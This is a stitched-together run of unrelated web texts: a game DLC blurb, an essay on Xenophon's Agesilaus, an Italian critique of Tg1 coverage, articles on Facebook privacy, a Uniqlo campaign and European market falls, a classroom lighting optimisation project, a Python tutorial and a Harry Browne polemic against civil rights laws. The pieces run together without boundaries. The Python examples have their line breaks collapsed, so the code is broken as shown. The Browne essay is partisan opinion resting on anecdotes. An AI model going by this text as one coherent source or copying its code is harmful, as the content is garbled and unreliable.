Rockstar has also stated that ' Outlaws To The End ' is the first of three DLC packages set to be released over the summer .
The other two will be revealed shortly .
The end of the Peloponnesian War saw Sparta alone as the preeminent power in Greece , but it did not take long for trouble to start again .
According to Xenophon , it was said the Persian king was assembling forces for another attack on the Greeks ( Agesilaus I : 6 - 7 ) .
The Spartan response was handled by one of their kings , Agesilaus , who crossed over into Asia Minor , liberated quite a few Greek cities there , and destroyed Persian forces while raiding .
Agesilaus became “ ruler of countless cities on the mainland , and master of islands – for the city [ Sparta ] had now added the fleet to his command ” ( I : 36 ) .
But he gave all of this up the second Sparta requested his aid closer to home ( Xenophon himself thought about creating a city with the army he had in the Anabasis and never returning to Athens ) .
The Persians bribed and aided many Greek cities – most notably Athens and Thebes – who were displeased with Sparta .
Many of the engagements with which Agesilaus was involved from that point onwards were against other Greeks ; we now call the disunity Persia helped sow the Corinthian War .
And yet it does not seem Xenophon speaks of Agesilaus ’ relation with Sparta as much as his desiring Greek unity ( see esp. chp VII ) .
Agesilaus is praised heavily for his piety ( III ; XI : 1 - 2 ) .
He is said to have thought kingship depends on being a “ noble and good ” ( perfect ) gentleman ( XI:6 ) .
Xenophon attests personally that he wanted to be praised rather than acquire money ( XI : 9 ; note moi ) .
And his conception of justice seems to have been that of “ helping friends and harming enemies ” ( IV : 5 - 6 , XI : 12 ) .
The extensive Persian bashing of chapters VII , VIII and IX does not fit with Xenophon ’s shrewdness .
Xenophon ’s Anabasis is partly an account of his admiration for an actual Persian ; his Cyropaedia sets forth Cyrus as an example of divine rule , ruling men as if they were herds .
Moreover , the Persian political shrewdness in dealing with Sparta reveals Agesilaus himself to be a bit limited in his approach to things .
I suspect the contrast between Greek and Persian rule is for the purpose of bringing forth this counterfactual :
What if Greek virtue was actually the ruling element among the Greeks ?
This would seem to be an expansion on what is implicit in the character of Thucydides ’ Nicias .
Nicias , an Athenian general , is very Spartan in his approach to things ; he is very pious , to say the least .
He is more concerned with moderation than acquisition ; the spirit of the law and stability govern his mindset .
There is much he can be criticized for , but he may ultimately speak to the possibility of Greek unity .
Agesilaus is a different man than Nicias .
He seems more capable than fearful .
His continence most certainly serves him better than Nicias ’ wealth ( IX : 3 - 7 ; XI : 11 - 12 ) .
The complete list of his virtues : piety ( III ) , justice ( IV ) , moderation ( V – the virtue is unnamed in the text ; it is tied to piety .
See Leo Strauss , Xenophon ’s Socrates p. 101 ) , courage , wisdom ( VI ) , love of the city ( VII ) , gracefulness ( VIII ) .
The center of his virtues is courage – no surprise , given II : 12 - 13 .
Courage is discussed in the same chapter with wisdom .
There are 11 chapters in the work as a whole ; chapter VI is doubly central .
There is a list of Socrates ’ virtues at the very end of the Memorabilia ( Memorabilia IV.8.11 ) : piety , justice , continence , prudence .
Socrates is said in that same passage to have turned people to virtue and being “ noble and good ” ( perfect ) gentlemen .
Is Agesilaus a Socratic ?
Socrates was just in that he harmed no one ; Agesilaus went and attacked the Persians before anything happened .
Agesilaus ’ wisdom is described as follows :
Of his Wisdom I find the evidence in every one of his deeds .
Towards his fatherland he behaved in such a manner that , being entirely obedient to her , he won the obedience of the citizens , and by his zeal for his comrades he held the unquestioning devotion of his friends : and as for his troops , he gained at once their obedience and their affection .
Surely nothing is wanting to the strength of that battle - line in which obedience results in perfect discipline , and affection for the general produces faithful promptitude .
As for the enemy , though they were forced to hate , he gave them no chance to disparage him .
For he contrived that his allies always had the better of them , by the use of deception when occasion offered , by anticipating their action if speed was necessary , by hiding when it suited his purpose , and by practising all the opposite methods when dealing with enemies to those which he applied when dealing with friends .
Night , for example , was to him as day , and day as night , for he often veiled his movements so completely that none could guess where he was , whither he was going , or what he meant to do .
Thus he made even strong positions untenable to the enemy , turning one , scaling another , snatching a third by stealth .
On the march , whenever he knew that the enemy could bring him to an engagement if they chose , he would lead his army in close order , alert and ready to defend himself , moving on as quietly as a modest maiden , since he held that this was the best means of maintaining calm , of avoiding panic , confusion , and blundering , and of guarding against a surprise attack .
And so , by using such methods , he was formidable to his enemies , and inspired his friends with strength and confidence .
Thus he was never despised by his foes , never brought to account by the citizens , never blamed by his friends , but throughout his career he was praised and idolized by all the world ( Agesilaus VI : 4 - 8 ) .
It is true Xenophon describes philosophy in martial terms in some places : the boar in On Hunting is Being , and must be hunted with friends willing to shed both its and their own blood .
Maybe something philosophic is occurring above ( Socrates is a midwife and erotic , not a maiden , and certainly not praised and idolized in his “ career ” ) , but if so , it is notable that a philosopher can be a general , but perhaps not the other way around ( Memorabilia III.1 , Plato ’s Laches – kids , really do n’t try this at home .
Or abroad ) .
Agesilaus ’ “ wisdom ” bears a striking resemblance to courage putting his notion of justice into action , as opposed to justice simply flowing from wisdom .
References
Xenophon , Agesilaus .
tr. E.C. Marchant in Xenophon : Scripta Minora . ( Loeb Classical Library ) ed. Jeffrey Henderson .
Cambridge : Harvard , 1968 .
Tg1 di oggi , edizione delle 13:30 .
Si parla della scarcerazione di Diego Anemone e Mauro Della Giovanpaola .
In un servizio della durata complessiva di 28 secondi viene infilata anche la notizia riguardante il ministro della Cultura Sandro Bondi .
A questo modo :
Il ministro della cultura Bondi ha replicato ( 1 ) alle indiscrezioni ( 2 ) comparse sui quotidiani relative ad appalti per alcuni musei ( 3 ) .
“ E’ stata ferita la mia onorabilità – ha detto – non ho nulla a che fare con faccende e faccendieri ” ( 4 ) .
In tutto 13 secondi .
Ho costruito una breve legenda per fare maggiore chiarezza su questo ennesimo caso di disinformazione del Tg1 .
Legenda :
(1) Replicato : non si capisce come si possa replicare a una notizia che non è stata data .
O meglio , che viene data in modo inesatto e incompleto solamente per mettere in evidenza la replica ( anch ’essa data in modo incompleto ) .
(2) Indiscrezioni : in realtà si tratta di una relazione dei Carabinieri e depositata alla Procura di Firenze “ per il giudizio immediato ” .
Altro che “ indiscrezioni ” : si tratta della prosecuzione dell ’ inchiesta sugli appalti dei grandi eventi che ha visto coinvolto , e vede ancora coinvolto , Guido Bertolaso .
(3) Appalti per alcuni musei : questa è la notizia , ridotta a una locuzione di quattro parole .
Che , naturalmente , non possono bastare per dire che con un placet del ministro Bondi sarebbe stato promosso a direttore dei lavori del restauro dei nuovi Uffizi un ingegnere agrigentino “ in odore di mafia ” ( il fratello è responsabile tecnico di una ditta “ sotto il controllo di esponenti della Cosa Nostra Agrigentina ” ) che “ non appare essere munito di una particolare esperienza “ , ma che in compenso ha seduto nel cda di una società di erbe medicinali ed è stato socio di un’altra che “ ha come oggetto l’attività di parrucchiere per uomo , donna e bambino “ .
Per il resto dei dettagli consiglio la lettura del pezzo di Fiorenza Sarzanini per il Corriere , non esattamente un quotidiano “ forcaiolo ” o “ giustizialista ” .
(4) Non ho nulla a che fare con faccende e faccendieri : anche la replica deve essere “ potata ” per risultare coerente con il modo in cui è data la notizia , e in particolare con l ’idea che degli atti di indagine siano “ indiscrezioni ” .
Il ministro aveva infatti detto : “ Per quanto riguarda il Museo degli Uffizi , appena ho avuto conoscenza delle indagini della magistratura , ho revocato immediatamente il commissariamento per agevolare il lavoro della magistratura stessa , proprio perché non ho nulla a che fare con faccende e faccendieri di cui si parla ” .
La parola “ magistratura ” non compare nemmeno una volta nella “ notizia ” data dal Tg1 – mentre invece si parla di “ indiscrezioni ” pubblicate dai “ quotidiani ” .
Insomma , passa l ’idea che si tratti di un ennesimo processo mediatico , quando invece è in corso una inchiesta .
Nell ’edizione delle 20:00 , per non sbagliarsi , della questione non si parla affatto .
Insomma , al Tg1 sbagliando non si impara .
Vorrà dire che continueremo a fornire legende che trasformino quelle del telegiornale in notizie .
PS : Nel frattempo Emilio Fede dava il suo peggio .
BOSTON – Facebook ’s lax privacy policies have been likened to a “ death trap ” by one critic , a “ train wreck ” by another and just plain “ awfulness ” by yet a third .
The company has taken our rights and trampled on them , the blogosphere rhetoric goes .
People are angry .
In response to irate users and advocacy groups , Facebook announced this week that it had modified its privacy settings to make it easier for people to control who gets to see their personal information .
Most applaud Facebook for making the recent changes , though many feel it still has further to go to safeguard people ’s privacy .
But what about the reaction in other countries ?
The U.S. is Facebook ’s largest market with more than 125 million users , but it ’s far from the only country where Facebook is all the rage .
According to checkfacebook.com , which tracks the company ’s growth , the U.K. is the second biggest market with more than 27 million users , followed by Indonesia with nearly 25 million .
Turkey has 22.5 million Facebook users and France has almost 19 million .
Jeffrey Chester , executive director for the Center for Digital Democracy in Washington , said there had been “ unusually strong international pressure from policymakers to force Facebook to change . ”
He cited a letter from the Article 29 Working Party , a group of influential data protection experts advising the EU , that called Facebook ’s default settings “ unacceptable ” and ordered it to reverse them .
In Canada , the government 's privacy commissioner also took issue with Facebook .
“ The principal reason Facebook made these changes was due to threats from Transatlantic government officials , ” Chester wrote by email Friday .
But according to several GlobalPost contributors in locales as disparate as Indonesia , Venezuela and France , what 's notable is how little average Facebook users care about the privacy controversy .
In France , if Facebook is making headlines , it ’s for helping to organize enormous cocktail parties , several of which have gotten out of hand — notably , in Nantes in early May , one of the 10,000 party - goers fell to his death from a bridge , drunk .
GlobalPost ’s Mildrade Cherfils reported on a similar party organized in Paris that was squashed by city officials .
People in Venezuela have n’t raised a stink about privacy , though there has been documented concern about criminals using information gathered from Facebook for kidnappings and robberies , as reported in GlobalPost by Charlie Devereux .
In Indonesia , Facebook 's privacy woes have received limited attention , despite the social networking site 's position as the country 's most popular website .
Online articles on Facebook 's recent privacy setting changes have only received few comments , many of which support the company and its founder Mark Zuckerberg .
One user on the Indonesian - language website of newspaper Kompas , tomazo suryono commented : " The users are getting weirder .
How can they post / upload their personal information on facebook and hope FB can completely close it off ... for what ???
If you do n't want to share , write it down in your diary or journal or whatever , store it in your cupboard , lock it padlock it ... done ... "
Diarmuid Hallinan , assistant commissioner at the Office of the Data Protection Commissioner in Ireland , wrote by email Friday that “ [ w ] hile there has been a reasonable amount of media coverage of Facebook 's privacy controls in our national media we have not received any complaints from users in this jurisdiction . ”
So , why the lack of concern ?
Is it that people abroad do n’t put the same premium on privacy that Americans do ?
A Daily Beast column entitled “ Why India Loves Facebook ” suggests as much .
India and Facebook are a match made in heaven , Tunku Varadarajan argues , precisely because India is a country in which “ being all up in one another 's business is practically a birthright . ”
Facebook users in many countries routinely leave complete personal information , including phone numbers , addresses and photos , publicly available to non-friends on their profile pages .
Friend requests from complete strangers are commonplace .
“ When it comes to Facebook … people seem not to care that much , and , more importantly , they are not aware of the extent to which Facebook uses user information , ” said Miyase Christensen , a professor of media and communication studies at Karlstad University in Sweden .
“ [ T ]he Facebook privacy issue is not causing a major public uproar in Turkey as it is in the U.S. or Canada for example .
At least , for now .
I think it has to do with the fact that the U.S. has a more established grassroots advocacy network when it comes to the question of privacy .
Online privacy is a relatively new question in Turkey and therefore there are n't as many civil society organization and groups addressing this question , ” she wrote by email Friday .
In Venezuela , though , where 6 million out of 9 million internet users are on Facebook , people tend seem to accept the invasion of privacy and choose to regulate their own output of information , according to Carlos Jimenez of Tendencias Digitales , which compiles internet data in Venezuela .
" How do people protect themselves ?
Instead of asking for policy changes what lots of people do is not put out too much information .
That 's the way people protect themselves here — by trying to put the least amount of information on their profile , ” said Jimenez .
Sree Sreenivasan , professor of digital journalism at Columbia Journalism School , said that , by and large , he has been overwhelmed at how , even in the U.S. , so few people care about the invasion of their privacy .
“ Privacy is no longer the social norm , ” he said .
“ Most people do n’t care . ”
They might care in theory , but depending on their age , demographic and what they do , that level of care varies – something he attributed to people not fully grasping the issue .
Sreenivasan said he has curtailed his own use of social media in response to privacy concerns , but that he has n’t met “ one person upset enough to do something about it . …
It ’s a problem . ”
“ It should be the cover of TIME magazine ...
It should be the lead item on the evening news : what the new Facebook has done to privacy . ”
Aubrey Belford , Charlie Devereux and Mildrade Cherfils contributed to this report .
Editor 's note :
This story was updated to correct the spelling of a name .
Japanese fashion giant Uniqlo has made it to the Twitter Trending Topics through their latest campaign “ Lucky Line ” , which celebrates their 26th anniversary .
The central campaign website [ J ] extends to reveal a virtual line of Twitter users who have entered for the chance to win a 1,000 yen coupon to Uniqlo shops .
Users join the line by auto - tweeting from the website , “ I have joined the Uniqlo Lucky Line . I ’m number 100 ! ” .
One out of every 26 users will be chosen , based upon their number in line .
While the campaign has only just begun , more than 15,000 people have already joined .
Twitter user @_startin appears to be the first one in line .
Uniqlo is known for running successful viral web campaigns , like UTweet and Uniqlock .
Share this : Twitter
Reddit
Tumblr
Facebook
More
Google
Pinterest
Email
Sustainable Lighting
Lighting is often considered “ low - hanging fruit ” from a sustainability standpoint .
It is not difficult to change to a more energy efficient light bulb that can significantly lower electricity usage , which in turn reduces cost and emissions .
There can be other trade - offs , a well - known one being that the more energy efficient CFL bulbs often contain mercury , a hazardous material , requiring more careful and costly disposal .
These and other factors lead to a nice O.R. problem on lighting .
This past semester we ran a student project on re-designing lighting in a classroom space .
The problem was to determine the optimal locations of bulbs as well as the kinds of bulbs to use in order to minimize costs ( bulb purchase , bulb disposal , and electricity ) while meeting standard illumination thresholds .
There are fairly sophisticated computer programs that will do this for you ( see DIALux ) .
But having students develop their own model makes sense because it is something they can realistically complete in one semester , and the process can be eye - opening for them .
There is another reason related to the discussion here on life - cycle assessment software from a while back .
That post described a demonstration in which two different programs were used to calculate the carbon footprint of a simple construction and each subsequently came up with estimates that differed by three orders of magnitude .
The models used by these programs will have underlying assumptions , some made clear in the program or its documentation , others buried more deeply .
So a good part of the exercise in developing such a program from scratch is to then compare its results with off - the - shelf software , as well as its assumptions .
Lighting is simpler than life - cycle assessment , so the challenge of aligning models should be within reason .
To formulate the problem , the ceiling and desk level ( where the illumination is to be measured ) were broken up into grid cells ( see figure ) .
Each ceiling cell can contain at most one bulb from a list of several types .
The contribution to the illumination at a given desk level location from a ceiling bulb is calculated using the formula illuminance at desk ( measured in lux ) = light intensity of bulb ( measured in lumens ) / distance ^2 .
The overall illumination at the desk location is found by summing these contributions over all of the ceiling cells .
The students found the current room to be significantly over - illuminated .
Their solution came in just above the illumination threshold with a smaller number of bulbs spaced across the ceiling .
A ( somewhat paraphrased ) portion of the formulation follows .
Definitions
if bulb type i is in location j , k ; 0 otherwise
light intensity ( in lumens ) of bulb type i
purchase cost of bulb type i
disposal cost of bulb type i
power usage ( in watts ) of bulb type i
# of life - spans of bulb type i over the given time frame
total # of bulbs of type i in the design
distance from ceiling cell ( j , k ) to desk cell ( l , m )
illumination threshold ( in lux )
Objectives
Minimize bulb purchase cost
Minimize bulb disposal cost
Minimize bulb power usage
Constraints
for each desk cell ( l , m ) ( illumination constraint )
for each ceiling cell ( j , k ) ( at most one bulb per cell )
…
Note the objectives are left somewhat vague here .
For instance the power objective can be converted to cost using the price of electricity ( $ 0.16 / kwh in this region ) , or to emissions ( 1.2 lbs of CO2 per kwh here ) .
The three objectives can be combined in a multiple objective optimization with weights as desired by the decision maker , some can be turned into constraints , etc .
Many other considerations could be added such as lighting fixtures used , windows , occupancy timers , room obstructions , light tubes , maintenance issues , light quality , etc .
Another aspect of this project was that it was run in conjunction with similar ones from the Civil Engineering and Management Departments .
The civil group focused more on general sustainable design in the room including but not limited to lighting .
The interaction ended up not being extensive but exchanges of information ( e.g. CAD drawings of the room ) and ideas took place throughout the semester .
These projects provide a great opportunity for multidisciplinary collaboration .
That includes not only the academic disciplines but also the real - world operational side of the institution as well .
The reference is Analyzing Light Optimization at the United States Coast Guard Academy : Minimizing Cost and Environmental Impact by T. Cassel , A. Donato , and R. Mozolic , USCGA Dept. of Mathematics Capstone Report , Spring 2010 , Advisors : I. Frommer and M. Case .
European stock markets closed sharply lower after a day of continued fears about eurozone debt problems and their potential impact on the global economic recovery .
The FTSE 100 index in London closed down by 2.54 % to an eight - month low of 4,940.68 points .
Germany 's Dax index was 2.34 % lower , while in France the Cac 40 fell 2.9 % .
In afternoon US trade , the Dow Jones was down by 1.55 % , and the broader S&P 500 index was 1.51 % .
Earlier , Asian markets also saw sharp falls .
As well as eurozone worries , stocks in South Korea and Japan had been affected as North Korea reportedly went on to military alert .
North Korea later announced it was severing ties with South Korea .
In London , the FTSE 100 has now fallen by more than 10 % in little more than a month after hitting a 22 - month high in April - it stands at its lowest level since 7 September 2009 .
' Toxic cocktail '
It 's all looking a bit unstable again Robert Peston , BBC business editor Peston on market turmoil
The renewed concerns about eurozone debt follow Monday 's strongly - worded comments from the International Monetary Fund that the Spanish economy needs comprehensive and far - reaching reform .
That added to investors ' worries over the weekend rescue of Spanish bank Cajasur by the Bank of Spain , only the second time the central bank has saved a regional lender .
Amid concerns over solvency in the sector , and in the wake of the Cajasur rescue , four Spanish savings banks then announced plans to merge .
Will these [ government budget ] cuts reduce demand and so make cutting deficits even harder ?
There is a risk here .
Gavin Hewitt , BBC Europe editor Read Gavin 's blog in full
Cajastur , Caja de Ahorros del Mediterraneo , Caja Extremadura and Caja Cantabria said they had reached agreement to form a group that would " strengthen solvency and assets of the participating banks " .
" There 's never been any mystery about the excessive exposure of Spain 's banks to a bloated property market , " said BBC business editor Robert Peston .
" The mystery has been how its banks avoided crippling losses on this exposure - although that increasingly looks like pain postponed rather than avoided .
" Or , at least , that 's what today 's retreat in share prices across Europe is saying , with bank shares falling especially sharply , " he added .
These concerns have lead investors to seek " safe havens " for their money .
German government bonds - or Bunds - are currently seen as one such place - the ten - year bund yield sank to a record low of 2.55 % .
The yield is the interest rate an investor receives on a bond .
If it is low in comaprison to other governments ' bonds , it indicates investors have high trust that it will be paid back and are prepared to accept the lower interest in return for that certainty .
Weak euro
A strong dollar is another traditional safe haven .
The euro and the pound both weakened against the US currency .
The euro fell by 0.8 % to $ 1.228 .
Against the pound the euro was trading at £ 0.855 , making £ 1 worth 1.169 euros .
The continued weakness of the euro is a concern , with investors dumping the currency amid fears that debts will cause defaults by weaker countries in the European Union .
The single currency has fallen in value by almost a fifth against the dollar in the last six months .
Richard Hunter , head of equities at Hargreaves Lansdown stockbrokers , said : " The toxic cocktail worsens .
Continuing fears over the European debt situation stalling the global economic recovery has been exacerbated by the potential of military tensions in Korea . "
And he said there was a shortage of buyers prepared to commit to the market at the present time .
' Sluggish recovery '
On Tuesday , the European Union Economy Commissioner , Olli Rehn , warned that governments needed to make major reforms to boost growth .
" The big risk is that once the recovery gets more robust , we sit idly in self - complacency and forget the structural reforms .
" That would lead us to a sluggish recovery - or even a lost decade , " he said in a speech at the Brussels Economic Forum .
He said the reforms needed for each European country varied , but he called for the opening up of national markets .
Countries such as Greece , at the centre of fears about the eurozone economy , have regularly ignored EU calls to liberalise markets .
Another nation which has ignored calls to open its markets is Italy , which is set to reveal an austerity budget later on Tuesday .
Regional tensions
Earlier in Asia , Japanese stocks fell by 3.1 % , and shares in South Korea fell by 2.7 % .
Australian shares fell by 3 % , Taiwanese stocks dropped 3.23 % and the wider MSCI measure of Asia - Pacific shares outside of Japan fell by 3.6 % .
Shares in Hong Kong , Singapore , Indonesia , China , India , Thailand and Malaysia all fell .
There were reports in South Korea that North Korea had told its military to prepare for war , but only if the South attacked it first .
Tensions in the region have been growing since international investigators blamed the North for torpedoing and sinking a South Korean warship in March , killing 46 sailors .
The falls in Asia come after major markets in the US closed lower overnight , with the Dow Jones shedding 1.2 % and the S&P 500 dropping 1.3 % .
Gigi Sayfan specializes in cross-platform object - oriented programming in C/C++/ C# / Python / Java with emphasis on large - scale distributed systems .
He is currently trying to build intelligent machines inspired by the brain at Numenta ( www.numenta.com).
Python is a great dynamic language .
In what way ?
For one thing , it allows you to add attributes to objects anytime .
Consider the following class A :
class A ( object ) : def __init__ ( self ) : self.x = 5 def set_y ( self , value ) : self.y = value
When you instantiate it as in :
a = A ( )
The __init__( ) is executed and the x attribute is set to 5 .
However , it has no y attribute just yet :
print ' a.x : ' , a.x
So try :
print ' a.y :' , a.y except AttributeError : print " a has no 'y ' attribute "
Output :
a.x : 5 a.y : a has no 'y ' attribute
Now , if you call the set_y ( ) method suddenly the a object grows a ' y ' attribute .
You can even add a 'z ' attribute willy nilly from outside the class :
a.set_y ( 8 ) print ' a.y :' , a.y a.z = 12 print ' a.z : ' , a.z
Output :
a.y : 8 a.z : 12
What 's going on here ?
It 's actually pretty simple .
Each Python object keeps all its attributes in a special dictionary ( a collection of key - value pairs ) called __dict__ and anyone can access the __dict__ of any object and add / delete / modify items .
Here is the __dict__ after y and z were added :
print a.__dict__ {'y ' : 8 , 'x ' : 5 , 'z ' : 12}
Note that __dict__ is not ordered by the insertion order .
Python lets you remove attributes using the del statement and check for the existence of attributes using the hasattr ( ) function .
Here I verify that a has a 'z ' attribute , remove it , and verify it does n't have a 'z ' attribute anymore :
>>> assert hasattr ( a , 'z ' ) >>> del a.z >>> assert not hasattr ( a , 'z ' )
But , you can delete it directly by working with the __dict__ .
Here I check that 'y ' is in the __dict__ , remove it from the __dict__ , and check it 's not in the __dict__ .
>>> assert 'y ' in a.__dict__ >>> del a.__dict__ ['y ' ] >>> assert 'y ' not in a.__dict__
It looks like hasattr ( ) is not really needed , but that 's not the case .
Python objects have many attributes that are not in their __dict__ .
For example , the __dict__ itself is not in the __dict__ .
Python objects get many attributes from their types .
For example , the __init__ ( ) and set_y ( ) methods are also attributes that the ' a ' object gets from its class A :
>>> a.set_y < bound method A.set_y of < code .
A object at 0x411730 >> >>> hasattr( a , ' set_y ' )
True >>> ' set_y ' in a.__dict__
False
The bottom line is that it 's good to know about the __dict__ , but you should use hasattr ( ) if you want to test for the exsitence of an attribute .
If you want to see all the attributes try the ' dir ' function :
>>> dir( a ) [ ' __class__ ' , ' __delattr__ ' , ' __dict__ ' , ' __doc__ ' , ' __format__ ' , ' __getattribute__ ' , ' __hash__ ' , ' __init__ ' , ' __module__ ' , ' __new__ ' , ' __reduce__ ' , ' __reduce_ex__ ' , ' __repr__ ' , ' __setattr__ ' , ' __sizeof__ ' , ' __str__ ' , ' __subclasshook__ ' , ' __weakref__ ' , ' set_y ' , 'x ' ]
In some situations this enormous flexibility becomes a burden .
At Numenta where I work , we use Python objects as plugins to a runtime engine ( server ) that communicates with a client that may potentially be on another machine .
This means that the communication goes through a special protocol and operations on the plugins such as initialization , execution and persistence are orchestrated carefully .
The runtime engine itself is implemented in C++ and interacts with the Python object indirectly through a C++ wrapper .
A common scenario is that the Python object creates new attributes during its execution .
But this also caused a lot of confusion and subtle bugs .
Some attributes were n't available at the right time .
Typos could n't be detected easily ( setting an attribute with the wrong name just created a new attribute ) .
To make things even worse , a few generations of changes led to various attributes becoming obsolete and / or deprecated .
These attributes were created on - the - fly when loading an old object from a file .
This aspect of Python became a real obstacle .
The solution that emerged was that new attributes should be created only in the __init__ ( ) and __setstate__ ( ) methods .
The __init ( ) __ method is the method that 's being called when a new object is instantiated for the first time .
The __setstate__ ( ) method is called when an object is loaded from a " pickle " file .
A pickle file is simply a built - in serialization scheme that Python supports .
That allows persisting Python objects across multiple sessions of the application .
Okay , so this policy means that methods like set_y ( ) are invalid ( unless called directly or indirectly from __init__ ( ) or __setstate__ ( ) ) because they create a new attribute .
Also external code that tries to create new attributes like ' a.z = 12 ' is forbidden .
If you have an attribute that you do n't know what to set it to at __init__ ( ) time , just set it to ' None ' .
Well , that sounds great , but just telling programmers about this magnificent new policy is not enough .
Programmers are notorious for being a confused and / or belligerent bunch and even the most obedient programers can't escape typos .
The Numenta software has many Python plugins , which are pretty big objects ( some has 20 - 30 attributes ) and it's not an easy task even to detect violations of policy , not to mention fixing them .
What is needed is an automated approach that can enforce the policy without excpetion .
This is were the lock attributes pattern comes into play .
It is a pretty sophisticated solution that involves intercepting attribute setting and checking for violations .
When a violation is detected an exception is raised .
The Civil Rights Laws & The Growth of Government by Harry Browne November 19 , 2003
The political process always manages to turn idealistic dreams inside out .
For an excellent example , look no further than the civil rights laws passed in the last 40 years .
For almost a century before 1964 , governments in many southern states forced segregation on the people .
Government prohibited companies from providing racially integrated facilities for their employees or customers .
Whites and blacks were forbidden by government to sit together in restaurants or to use the same restrooms and drinking fountains — and in many cases were forbidden to shop together or work together .
Civil rights advocates fought to repeal these state Jim Crow laws , but they failed .
So they appealed to the federal government , which responded with the Civil Rights Act of 1964 .
But this did n't simply repeal state laws compelling segregation .
It prohibited racial segregation — voluntary or otherwise .
Overnight , what had been mandatory became forbidden .
Neither before nor after the Civil Rights
Act were people free to make their own decisions about whom they would associate with .
The civil rights movement was n't opposed to using government to coerce people .
It merely wanted the government to aim its force in a new direction .
Although the activists believed coercion served the noble objective of bringing the races closer together , it was coercion nonetheless .
The Giant Begins to Grow And coercive laws never stand still .
No matter what a law 's backers say at the time of passage , the law always stretches in surprising directions .
The expansion occurs on at least two fronts :
The law almost always is enforced more broadly than intended ;
When government benefits one group , other groups are encouraged to seek similar benefits .
And this is what happened to the civil rights laws .
In the first regard , the bureaucrats and courts set out to enforce the laws zealously , seeking to root out any kind of discrimination — even though ending segregation , not discrimination , was the motive behind the original law .
Companies were ordered not to consider race in any way when making hiring decisions .
But usually the reasons for a business decision are hard to prove .
Unless a businessman is a noisy bigot , who can say whether racial discrimination has affected his decision to hire someone ?
To avoid having to read minds , the enforcers examined results to determine whether discrimination had occurred .
If you did n't have a suitable racial mix in your workforce ( or even among your customers ) , you were assumed to be discriminating — and the burden of proof was on you to prove otherwise .
So an employer could avoid charges of discrimination only by , in fact , discriminating — by using quotas to assure that he hired the right number of people of the right races — even though the original sponsors of the law had sworn that quotas were no part of it .
The law against segregation had been transformed into a law requiring discrimination .
The law also encouraged other groups to demand similar coverage .
Once it was established that government should punish racial discrimination , the door was open to using government to punish anything similar .
If it 's wrong for an employer , landlord , or organization to discriminate according to race , it must be just as wrong to discriminate according to gender .
So the coercion expanded to prohibit discrimination against women — and then religious believers , and then the elderly , and then people with children , and then the handicapped .
The New Aristocracy Civil rights laws feed lucrative lawsuits .
So every imaginable group wants to be covered by the laws — to be eligible for generous settlements .
There 's pressure to outlaw discrimination on the basis of sexual preference , weight , looks , drug use , illness , criminal record , citizenship , and many other categories .
Everyone wants to become part of the aristocracy .
And it is an aristocracy these groups are trying to join .
Once they 're on the " A - List , " they have special powers .
They can sue anyone who refuses to hire them , to rent an apartment to them , or to sell his services to them — and maybe force him to pay thousands or millions of dollars in punitive damages .
No company can risk such a disaster by offending someone in the aristocracy — since almost any mistake might be considered evidence of discrimination .
For example , in 1993 six U.S. Secret Service agents sued the Denny 's restaurant chain — complaining they received poor service because they 're black .
And how do they know their color was the reason for the poor service ?
Because a group of white people entered the restaurant at the same time they did , and the white people finished their meals before the blacks received their first course .
To many people this was proof of discrimination .
Now , if you happen to be a white male , you 've probably never felt such an insult .
It 's true you may have endured dreadful service in a coffee shop — perhaps many times .
A waiter may have refused to give you the time of day , lost your order and forgotten you were even in the restaurant , spent all his time flirting with a waitress , or refused to take care of you until he had phoned his bookie .
The family at the next table may have eaten an entire meal before anyone even asked for your order .
And so you passed the time counting the designs on the wallpaper .
But it is n't called discrimination if you are n't part of a group that 's been certified as oppressed .
So you have to blame it on a bad - tempered waiter , an overcrowded restaurant , or poor management .
Since you are n't part of the aristocracy , there 's no chance you were insulted because of your race ( or your religion , handicap , or any other recognized status ) .
You were insulted just because you 're you .
And your only recourse is to find a coffee shop that will treat you better .
The Denny 's customers , however , could file a law suit — and they did .
To avoid a long , expensive trial and months of unfavorable news coverage , Denny 's settled out of court and paid them $ 54 million .
1
Neither you nor I was in the Denny 's restaurant that night .
And we are n't mind readers .
So we do n't know whether the waiter mistreated the Secret Service agents because of their race .
But we do know that if it 's possible to get an enormous payoff for claiming discrimination , many people will try to get it — whether or not they actually suffer discrimination .
So we should n't be surprised that so many accusations are made .
And with such rewards available for minor insults , it 's not surprising that more and more groups demand to be covered by the law .
Absurdity Becomes the Law
The civil rights laws are supposed to end discrimination and segregation , and to promote harmony .
But coercion never produces harmony .
How harmonious are people who are being forced to act against their will ?
Most likely , those who are coerced will resent those who benefit from the coercion .
This sets group against group ; it does n't bring them together .
And if we accept coercion for one purpose , we 'll be asked to use it for others .
Even if you can say " No " to the other uses , some people will say " Yes , " and others will say " Yes , please , and make mine a double . "
The noble cause will be stretched further and further until it eventually becomes farce .
For example : A Chicago company was hauled before the Equal Employment Opportunity Commission to explain why it failed to promote a woman who claims she was discriminated against because of the microchip in her tooth that allows her to communicate with others .
Then there 's the man who sued his employer who fired him for bringing a gun to work .
He said he was covered by the Americans for Disabilities Act ( an outgrowth of the Civil Rights Act of 1964 ) because he 's under psychiatric care .
The case will be tried before a jury .
A 220 - pound woman has sued the Minnesota National Guard , claiming that its 155 - pound limit discriminates against her eating disorder .
2
In 1993 a married couple was ejected from an airliner ( before takeoff ) because they had screamed a string of obscenities at other passengers .
So they sued the airline , claiming it had discriminated against them as sufferers of a disease that makes them utter profanities .
3
Has the law really been stretched so far ?
No , it has been stretched even further .
In fact , it has been stretched all the way inside out .
The civil rights laws originated to end segregation of the races in the South .
But in 1992 a Florida court used these laws to award a white woman permanent disability benefits — ruling that her employer should have provided a segregated workplace to accommodate her fear of blacks .
4
Although the decision seems absurd , something of the kind was inevitable .
If coercion is used to protect the feelings of black people , eventually it will be used to protect the feelings of white people as well .
Once government coerces on behalf of one group of " victims , " it will eventually swing the club on behalf of almost every imaginable group .
You ca n't limit coercion to the uses you think are right .
So do n't think of any of these cases as an example of a government program gone wrong .
Each is an example of a government program — period .
You 're Not a Dictator I 've used the Civil Rights
Act as an example of the way a well - intentioned government program grows and causes far more problems than it solves .
But it is just one example .
All government programs expand to encompass the political demands of people who want to take advantage of its benefits .
And almost all government programs eventually do the opposite of what their original backers had asked for .
Whatever social reform you may envision , the version the government implements will be something completely different .
However lofty your purpose , it will be debased by compromises in the legislature , in the administration of the program by thousands of government employees , and in the settling of the inevitable disputes .
Not only that , the program is likely to grow far bigger and more complicated than what you wanted .
And someday it will evolve into a force opposite to your intentions .
You are n't a dictator .
You can't control the actions of politicians , bureaucrats , and judges .
Please remember that the next time you think some law will solve some great social problem .
---------------
